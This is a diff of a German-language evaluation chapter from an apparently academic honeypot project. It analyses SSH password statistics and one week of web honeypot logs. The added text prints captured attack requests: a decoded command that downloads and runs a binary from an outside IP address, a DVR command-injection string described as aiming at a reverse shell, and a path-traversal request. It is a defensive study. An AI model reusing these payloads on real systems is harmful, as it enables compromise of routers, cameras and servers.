--- a/Dokumentation/Dokumentation/08_evaluation.tex
+++ b/Dokumentation/Dokumentation/08_evaluation.tex
@@ -16,7 +16,7 @@ Die komplette Umsetzung des Projekts fand auf einem gemieteten vServer statt. Di
 \section{Schlussfolgerungen SSH-Honeypot}
 \label{sec:Schlussfolgerungen SSH-Honeypot}
 
-Wie der Statistik im Anhang unter \nameref{app:Pipal Passwortstatistik} entnommen werden kann, wurden am SSH-Honeypot-Port insgesamt 19450 Passwörter eingegeben, 7768 davon sind einzigartig. Die 10 meistgenutzten Passwörter machen 14,25\% aller Passworteingaben aus. Betrachtet man die 10 meistgenutzten Passwörter genauer, fällt auf, dass hier vorrangig die Zeichenketten \textit{admin}, \textit{password} und \textit{root} sowie Zahlenfolgen wie \textit{123456} vertreten sind. Die Länge der eingegeben Passwörter betrug in 14,31\% der Fälle zehn Zeichen, in 17,08\% acht Zeichen und in 25,04\% neun Zeichen. Über 84\% der eingegebenen Passwörter bestanden aus zehn oder weniger Zeichen. Ähnlich klare Verteilungen sind bei der Zusammensetzung von Passwörter aus Zeichenklassen zu erkennen. So bestehen über 26\% der Passwörter rein aus Kleinbuchstaben, weitere 8,76\% rein aus Zahlen.\\
+Wie der Statistik im Anhang unter \nameref{app:Pipal Passwortstatistik} entnommen werden kann, wurden am SSH-Honeypot-Port insgesamt 19450 Passwörter registriert, 7768 davon sind einzigartig. Die 10 meistgenutzten Passwörter machen 14,25\% aller Passworteingaben aus. Betrachtet man die 10 meistgenutzten Passwörter genauer, fällt auf, dass hier vorrangig die Zeichenketten \textit{admin}, \textit{password} und \textit{root} sowie Zahlenfolgen wie \textit{123456} vertreten sind. Die Länge der eingegeben Passwörter betrug in 14,31\% der Fälle zehn Zeichen, in 17,08\% acht Zeichen und in 25,04\% neun Zeichen. Über 84\% der eingegebenen Passwörter bestanden aus zehn oder weniger Zeichen. Ähnlich klare Verteilungen sind bei der Zusammensetzung von Passwörter aus Zeichenklassen zu erkennen. So bestehen über 26\% der Passwörter rein aus Kleinbuchstaben, weitere 8,76\% rein aus Zahlen.\\
 
 Eine ähnliche einseitige Verteilung lässt sich bei den verwendeten Benutzernamen erkennen. In 83,52\% der Fälle wurde der Benutzername \textit{root} verwendet. Wird der Benutzername \textit{admin} hinzugezählt, decken diese beiden Benutzernamen 94,34% ab.\\
 
@@ -35,41 +35,56 @@ Da selbst im Bewusstsein dieser Richtlinien dazu tendiert wird, nicht sichere Pa
 \section{Schlussfolgerungen Web-Honeypot}
 \label{sec:Schlussfolgerungen Web-Honeypot}
 
-Innerhalb eines Zeitraumes von einer Woche erfolgten auf dem Web-Honeypot 149 Zugriffe über HTTP und 5 POST-Requests. Angeforderte Pfade und POST-Requests können im Anhang unter \nameref{app:Auswertung snare-path-requests} und \nameref{app:Auswertung snare-post-requests} eingesehen werden. Während dieses Zeitraums bestand der Webauftritt des Web-Honeypots aus einer Kopie der Seite example.com\footnote{ \textit{example.com}: \url{http://example.com/}}. Ungeachtet der Tatsache, dass damit einem Angreifer lediglich die Möglichkeit gegeben war über verschiedene Pfade einen Zugriff zu potentiell über die Startseite nicht erreichbaren Login Seiten zu erhalten oder über Anwendung von HTTP-Methoden wie POST Schadcode einschleusen zu können und somit die angebotene Angriffsfläche sehr gering ausfiel, konnte das Projektteam mehrere verschiedene Angriffsszenarien aufzeichnen.\\
+Innerhalb eines Zeitraumes von einer Woche erfolgten auf dem Web-Honeypot 149 Zugriffe über HTTP und 5 POST-Requests. Angeforderte Pfade und POST-Requests können im Anhang unter \textit{\nameref{app:Auswertung snare-path-requests}} und \textit{\nameref{app:Auswertung snare-post-requests}} eingesehen werden. Während dieses Zeitraums bestand der Webauftritt des Web-Honeypots aus einer Kopie der Seite example.com\footnote{ \textit{example.com}: \url{http://example.com/}}. Ungeachtet der Tatsache, dass damit einem Angreifer lediglich die Möglichkeit gegeben war über verschiedene Pfade einen Zugriff zu potentiell über die Startseite nicht erreichbaren Login Seiten zu erhalten oder über Anwendung von HTTP-Methoden wie POST Schadcode einschleusen zu können und somit die angebotene Angriffsfläche sehr gering ausfiel, konnte das Projektteam mehrere verschiedene Angriffsszenarien aufzeichnen.\\
 
 Die im folgenden Abschnitt getroffenen Aussagen basieren auf Vermutungen, die durch den aktuellen Kenntnisstand des Projektteams begründet und entsprechend zu bewerten sind.\\
 
 61 Aufrufe des Root-Pfades der Webseite lassen darauf schließen, dass der Honeypot tatsächlich von circa 61 unterschiedlichen Systemen aufgerufen wurde. Auch die 14 Anfragen mit dem Ziel die Ressource 'favicon.ico' zu laden, lassen einen Rückschluss zu.  Bei dieser Ressource handelt es sich um ein Miniatur-Bild, ein Logo einer Webseite, das innerhalb eines Browser-Tabs der URI vorangestellt wird und im Wesentlichen der Repräsentation und Wiedererkennung dient. Das Anfordern dieser Ressource ist eine Eigenheit von verbreiteten Browsern, so lässt sich daraus schließen, dass es tatsächlich annähernd 14 manuell durchgeführte Aufrufe des Webhoneypots unter Verwendung eines Browsers gab. Da das Projektteam zu diesem Zeitpunkt bereits im Rahmen der Veröffentlichung dieser Dokumentation die IP-Adresse des Honeypots öffentlich gemacht hat, ist die Möglichkeit nicht auszuschließen, dass diese Zugriffe dieser Veröffentlichung zuzuschreiben sind und sonst möglicherweise nicht stattgefunden hätten.\\ 
 
-Die wenig ansprechende Optik, der Mangel an Inhalten und Angriffsflächen in Form von Eingabefeldern der während dieses Zeitraums aktiven Weboberfläche des Honeypots, lassen darauf schließen, dass der Großteil der aufgezeichneten Zugriffe und Zugriffsversuche automatisiert stattgefunden hat. Dafür sprechen auch 5 Zugriffe auf die Datei 'robots.txt', die insbesondere von gutartigen aber auch bösartigen Bots, so genannten Webcrawlern, die das Internet automatisiert nach Inhalten durchsuchen, ausgewertet wird. So ist es eine gängige Praxis diese Datei nach Einträgen mit vorangestelltem 'disallow' zu durchsuchen, welche Pfade zu Ressourcen angibt, welche von einem solchen Webcrawler auf Wunsch des Administrators nicht betrachtet werden sollen. Gerade diese Vorgabe macht es für Angreifer interessant, genau diese, vom Administrator nicht zur Durchsicht erwünschten, Ressourcen aufzurufen und zu analysieren. 5 Zugriffsversuche auf die Webanwendung phpMyAdmin\footnote{ \textit{phpMyAdmin}: \url{https://www.phpmyadmin.net/}} lassen darauf schließen, 
+Die wenig ansprechende Optik, der Mangel an Inhalten und Angriffsflächen in Form von Eingabefeldern der während dieses Zeitraums aktiven Weboberfläche des Honeypots, lassen darauf schließen, dass der Großteil der aufgezeichneten Zugriffe und Zugriffsversuche automatisiert stattgefunden hat. Dafür sprechen auch 5 Zugriffe auf die Datei 'robots.txt', die insbesondere von gutartigen aber auch bösartigen Bots, so genannten Webcrawlern, die das Internet automatisiert nach Inhalten durchsuchen, ausgewertet wird. So ist es eine gängige Praxis diese Datei nach Einträgen mit vorangestelltem 'disallow' zu durchsuchen, welche Pfade zu Ressourcen angibt, welche von einem solchen Webcrawler auf Wunsch des Administrators nicht betrachtet werden sollen. Gerade diese Vorgabe macht es für Angreifer interessant, eben selbige, vom Administrator nicht zur Durchsicht erwünschten, Ressourcen aufzurufen und zu analysieren.\\ 
 
+Desweiteren konnten 5 Zugriffsversuche auf die Webanwendung phpMyAdmin\footnote{ \textit{phpMyAdmin}: \url{https://www.phpmyadmin.net/}}, die bei unserem Honeypot nicht zum Einsatz kam, aber sehr häufig genutzt wird, festgestellt werden. Diese Angriffe ebenso wie der versuchte Aufruf von '/w00tw00t.at.blackhats.romanian.anti-sec:)' deuten auf einen durch Bots durchgeführten Angriff hin. So ist es insbesondere aufgrund dieses Eintrages anzunehmen, dass ein Bot namens ZmEu\footnote{ \textit{ZmEu}: \url{https://ensourced.wordpress.com/2011/02/25/zmeu-attacks-some-basic-forensic/}} dafür verantwortlich ist. Entsprechend der hier gemachten Erfahrungen, ist phpMyAdmin eine Webanwendung, die es im realen Einsatz besonders zu schützen gilt, da diese ein beliebtes Ziel für Angriffe zu sein scheint. Für das Projektteam würde es sich für zukünftige Honeypot lohnen, phpMyAdmin zu simulieren, um genauere Kenntnisse über stattfindende Angriffe erlangen zu können.\\
 
-Login-Formular nicht mehr relevant, nach Updates SNARE instabil.
+Insgesamt wurden über 30 Versuche geloggt, deren Ziel es war auf Login-Seiten zu gelangen. Das unterstreicht noch einmal die Erkenntnisse des Projektteams, die im Rahmen des Betriebs des SSH-Honeypots gemacht wurden, was die Bedeutung sicherer Passwörter anbelangt. Aufgrund dieser Zugriffsversuche hat sich das Projektteam dazu entschlossen, den Webhoneypot um ein Login-Formular zu erweitern. 
+Nach der Durchführung eines SNARE Updates war es dem Projektteam allerdings nicht mehr möglich den Webhoneypot erneut in Betrieb zu nehmen und somit konnten während dieser Phase keine weiteren Angriffe geloggt werden.\\
 
+Auch ein einzelner Eintrag ist an dieser Stelle erwähnenswert, verdeutlicht er doch die Breite des Spektrums, in der Angriffe stattfinden: Der Zugriffsversuch '/HNAP1' zielt auf eine Schwachstelle\footnote{ \textit{Schwachstellen von HNAP}: \url{https://isc.sans.edu/forums/diary/More+on+HNAP+What+is+it+How+to+Use+it+How+to+Find+it/17648/}} in der Implementierung des Home Network Administration Protocols(HNAP) unter anderem bei D-Link\footnote{ \textit{D-Link}: \url{http://www.dlink.com/de/de}}, aber auch anderen Routern hin.\\ 
 
-5 phpmyadmin (MySQL verwaltung)Aufrufe -> Hätte sich gelohnt etwas entsprechendes zu simulieren
--> Botnetz
--> Bot sucht Schwachstellen in phpmyadmin -> https://ensourced.wordpress.com/2011/02/25/zmeu-attacks-some-basic-forensic/
-http://stateofsecurity.com/?p=467
--> viele geskriptete Attacken auf phpmyadmin -> hohe Sicherheitsmaßnahmen nötig bei Vernwendung von phpmyadmin
--> http://sharadchhetri.com/2013/06/27/protect-from-w00tw00t-at-blackhats-romanian-anti-sec/
+'./stssys.htm' zählt auch zu der Kategorie einzigartig. So handelt es sich bei dieser Anfrage um den Versuch eine Schwachstelle\footnote{ \textit{Schwachstelle TRENDnet Printserver}: \url{https://neonprimetime.blogspot.de/2016/08/stssyshtm-wget-request.html}} bei TRENDnet Printservern auszunutzen, mit der Folge das betroffene Gerät auf Werkseinstellungen zurücksetzen und somit die IP-Adresse des Gerätes neu zu vergeben.\\
 
-Insgesamt über 30 Versuche auf Login-Flächen zu gelangen oder Passwörter abzurufen -> Wichtigkeit sicherer Passwörter
+Erst durch die Umwandlung von der hexadezimalen Schreibweise in ASCII offenbart sich 
 
-HNAP  014, the HNAP was succesfully exploited by The Moon worm
+\begin{lstlisting}[style=customc]
+/shell?\%63\%64\%20\%2F\%74\%6D\%70\%3B\%77\%67\%65\%74\%20\%2D\%63\%20\%68\%74\%74\%70\%3A\%2F\%2F\%31\%32\%32\%2E\%31\%31\%34\%2E\%32\%35\%33\%2E\%39\%34\%3A\%31\%35\%35\%32\%31\%2F\%61\%72\%6D\%67\%67\%3B\%63\%68\%6D\%6F\%64\%20\%37\%37\%37\%20\%61\%72\%6D\%67\%67\%3B\%2E\%2F\%61\%72\%6D\%67\%67\%20\%26
+\end{lstlisting}
 
-http://stateofsecurity.com/?p=467 
-   1 Request path: /nmaplowercheck1480791133
-   1 Request path: /nice%20ports%2C/Tri%6Eity.txt%2ebak
-   portscan mit nmap
+ als das was er wirklich ist:
+ 
+\begin{lstlisting}[style=customc]
+cd /tmp;wget -c http://122.114.253.94:15521/armgg;chmod 777 armgg;./armgg \&
+\end{lstlisting}
 
-w00tw00t -> This is just an automatic script deployed by many Script Kiddies looking for a security breach in your apache version/configuration. The signature w00tw00t is usually left by DFind.
+Über einen 'wget' wird versucht die Ressource 'armgg' von einer IP-Adresse herunterzuladen und gegebenenfalls unterbrochene Downloads, durch den Parameter '-c' für continue, fortzusetzen. 'armgg' soll durch 'chmod 777' von Jedermann gelesen, verändert oder ausgeführt werden können und daraufhin als Hintergrundprozess gestartet werden. Zu gegebener Zeit wird das Projektteam versuchen, diese Datei herunterzuladen und in einer gesicherten Umgebung betrachten.\\
 
-./stssys.htm -> https://neonprimetime.blogspot.de/2016/08/stssyshtm-wget-request.html
+Noch ausgefallener ist dieser Angriff:
 
-Schlussfolgerung aufgrund von Aufmachung(zunächst example-Klon, danach schäbiges Login-Formular) -> Großteil der Angriffe automatisiert
+\begin{lstlisting}[style=customc]
+/language/Swedish\${IFS}\&\&echo\${IFS}610cker>qt\&\&tar\${IFS}/string.js
+\end{lstlisting}
 
--> Man hätte noch IP-Adressen auswerten können indem man python-file von SNARE editiert hätte -> Zeitgründe
+Ziel dieses Angriffs ist es, eine Reverse-Shell auf Überwachungskameras zu erzeugen. Auf Kerneronsec\footnote{ \textit{Kerneronsec Remote Code Execution in CCTV-DVR}: \url{http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html}} wird die Vorgehensweise genau beschrieben. Der Aufruf von 
 
+\begin{lstlisting}[style=customc]
+/../../../../../../../mnt/mtd/qt
+\end{lstlisting}
+ ist auch Teil dieses Angriffs.\\
 
-Sample one:
+Zu guter Letzt ist es auch erwähnenswert, dass auch ein Portscan, hier mit nmap, Spuren\footnote{ \textit{Spuren eines nmap Port-Scans}: \url{http://stateofsecurity.com/?p=467 }} in den Log-Files eines Webservers hinterlässt, so sind die Einträge
+
+\begin{lstlisting}[style=customc]
+/nmaplowercheck1480791133' und /nice\%20ports\%2C/Tri\%6Eity.txt\%2ebak
+\end{lstlisting}
+
+zurückzuführen auf einen, vom Projektteam selbst, durchgeführten Scan.\\
+
+Aus einwöchigem Betrieb des Webhoneypots wird deutlich, dass ein über das Internet erreichbares System einer Vielzahl an unterschiedlichen Angriffen ausgesetzt ist. Der Der Großteil dieser Angriffe findet nach großer Wahrscheinlichkeit automatisiert statt und richtet sich gegen bekannte Sicherheitslücken von eingesetzter Software. Dieser Umstand verdeutlicht die Bedeutung und Wichtigkeit von regelmäßigen Updates. Für einen Systemadministrator hat dies zur Folge, dass der Zeitaufwand zur Erhaltung der Sicherheit mit der Anzahl an eingesetzten Software-Lösungen und Komponenten stark ansteigt.
